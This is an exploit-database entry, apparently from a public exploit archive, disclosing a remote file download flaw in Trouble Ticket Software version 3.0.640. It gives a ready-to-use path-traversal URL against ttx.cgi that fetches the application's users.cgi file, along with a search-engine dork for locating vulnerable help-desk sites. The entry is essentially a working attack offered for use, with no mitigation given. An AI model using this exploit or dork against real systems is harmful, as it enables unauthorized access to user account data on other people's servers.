id: 11384
date: 03/21/2010
title: Trouble Ticket Software ttx.cgi Remote File Download
author: n01d
cves: 

====================================================
Trouble Ticket Software ttx.cgi Remote File Download
====================================================


# Exploit Title: Trouble Ticket Software 0Day
# Date: 3/12/2010
# Author: n01d
# Software Link: http://www.troubleticketexpress.com
# Version: TTX v3.0.640
# Tested on: <=3.0.640
                 ___   _      _
         _ __   / _ \ / |  __| |
        | '_ \ | | | || | / _` |
        | | | || |_| || || (_| |
        |_| |_| \___/ |_| \__,_|
        Bob  @  http://n01d.com
 
 
Type:    Trouble Ticket Software 0Day
 
Vendor:  Remote File Download
 
Exploit: http://www.example.com/TTXdir/ ttx.cgi?cmd=file&fid=../users.cgi&fn=users.cgi
 
Dork:    "Help desk software by United Web Coders rev. 3.0.640"
 



#  0day.today [2023-03-24]  #